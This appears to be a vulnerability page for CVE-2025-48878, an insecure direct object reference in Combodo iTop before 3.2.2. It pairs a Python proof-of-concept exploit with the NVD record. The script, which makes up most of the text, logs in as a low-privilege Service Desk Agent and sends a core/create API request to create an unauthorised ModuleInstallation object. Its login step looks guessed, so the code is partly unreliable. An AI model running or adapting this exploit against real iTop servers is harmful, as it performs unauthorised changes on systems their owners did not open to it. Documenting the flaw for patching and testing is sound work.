CVE-2025-48878

import requests import json # CVE-2025-48878 PoC - Combodo iTop IDOR Vulnerability # Target: Combodo iTop < 3.2.2 # Vulnerability: Insecure Direct Object Reference in ModuleInstallation creation TARGET_URL = "http://target-itop-server/" LOGIN_URL = TARGET_URL + "pages/ajax.render.php" API_URL = TARGET_URL + "api.php" def login_as_service_agent(session, username, password): """Authenticate as a Service Desk Agent with limited privileges""" login_data = { "operation": "login", "username": username, "password": password } response = session.post(LOGIN_URL, data=login_data) return "auth_token" in response.text def exploit_idor(session): """Exploit the IDOR vulnerability to create ModuleInstallation object""" # Construct the malicious request to create ModuleInstallation object # This should normally require admin privileges, but IDOR allows # low-privilege users (Service Desk Agent) to create it exploit_data = { "operation": "core/create", "class": "ModuleInstallation", "fields": { "name": "MaliciousModule", "label": "Unauthorized Module", "version": "1.0.0", "description": "Module created via IDOR exploit" }, "comment": "CVE-2025-48878 PoC" } headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } response = session.post(API_URL, json=exploit_data, headers=headers) return response.json() def main(): session = requests.Session() # Step 1: Login as low-privilege user (Service Desk Agent) if login_as_service_agent(session, "agent_user", "password"): print("[+] Successfully authenticated as Service Desk Agent") else: print("[-] Authentication failed") return # Step 2: Exploit IDOR vulnerability result = exploit_idor(session) if result.get("code", 0) == 0 or "objects" in result: print("[+] IDOR Exploit Successful!") print(f"[+] ModuleInstallation object created: {json.dumps(result, indent=2)}") else: print("[-] Exploit failed or already patched") print(f"[-] Response: {json.dumps(result, indent=2)}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-48878", "sourceIdentifier": "[email protected]", "published": "2025-11-10T21:15:39.263", "lastModified": "2025-11-21T13:38:44.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Combodo iTop is a web based IT service management tool. In versions on the 3.x branch prior to 3.2.2, an insecure direct object reference allows a user (e.g. with Service desk agent profile) to create a ModuleInstallation object when they shouldn't be able to do so. Version 3.2.2 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.2.2", "matchCriteriaId": "EAF7CD83-4986-43B2-9A2B-3E282671B00F"}]}]}], "references": [{"url": "https://github.com/Combodo/iTop/security/advisories/GHSA-rj75-7cgw-4556", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}